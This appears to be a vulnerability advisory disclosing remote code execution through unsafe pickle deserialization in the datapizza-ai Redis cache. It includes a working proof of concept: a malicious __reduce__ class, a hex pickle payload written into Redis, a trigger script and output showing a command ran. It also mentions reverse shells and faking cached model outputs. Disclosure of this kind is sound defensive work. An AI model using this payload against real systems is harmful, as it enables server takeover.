datapizza-ai Redis Cache Unsafe Deserialization RCE via pickle.loads()

### Summary - **Vulnerability:** Unsafe Deserialization via pickle.loads() in datapizza-ai Redis cache. - **Impact:** Allows Remote Command Execution on the server host. - **CVSSv3:** HIGH 7.9/10 - **CVSS:** 3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H - **datapizza-ai Version:** v0.0.7 ### Details - **Cause:** Usage of vulnerable functions of pickle serialization library in `datapizza-ai-cache/redis/datapizza/cache/redis/cache.py` file. - **Source:** [GitHub Link](https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.7/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py) ### PoC #### Installation Steps ```bash python -m venv .env source .env/bin/activate pip install datapizza-ai==0.0.7 pip install datapizza-ai-cache-redis ``` #### Redis Server ```bash docker run -d --name redis -p 6379:6379 redis:latest ``` #### Proof of Concept - **Evil Class:** ```python class Evil: def __reduce__(self): return (os.system, ("touch cachepwnd",)) ``` - **Hex Representation:** `\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94.` - **Redis Cache Poisoning:** ```bash 127.0.0.1:6379> set poc "\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94" OK 127.0.0.1:6379> get poc ``` #### Python Program ```python from datapizza.cache.redis import RedisCache def test_redis_cache(): cache = RedisCache(host="localhost", port=6379, db=0) cache.get("poc") test_redis_cache() ``` - **Command Injection Result (ls -alh):** ```bash total 16K -rw-rw-r-- 1 edoardo edoardo 0 Oct 15 18:57 cachepwned -rw-rw-r-- 1 edoardo edoardo 778 Oct 15 19:00 notes.txt -rw-rw-r-- 1 edoardo edoardo 826 Oct 14 14:39 poc3-working.py -rw-rw-r-- 1 edoardo edoardo 312 Oct 15 18:51 poc-cache.py drwxrwxr-x 5 edoardo edoardo 4.0K Oct 14 11:53 .venv/ ``` ### Impact - **Attackers can control Redis cache to subvert model behavior and inject fake outputs in cached queries.** - **Arbitrary system commands execution possible (e.g., reverse shell).** - **High impact as the attacker can completely take over the server host.** ### References - [Python Pickle Documentation](https://docs.python.org/3/library/pickle.html) ### Credits - **Edoardo Ottavianelli [@edoardott]**

Goal Reached Thanks to every supporter — we hit 100%!

datapizza-ai Redis Cache Unsafe Deserialization RCE via pickle.loads()

More from this source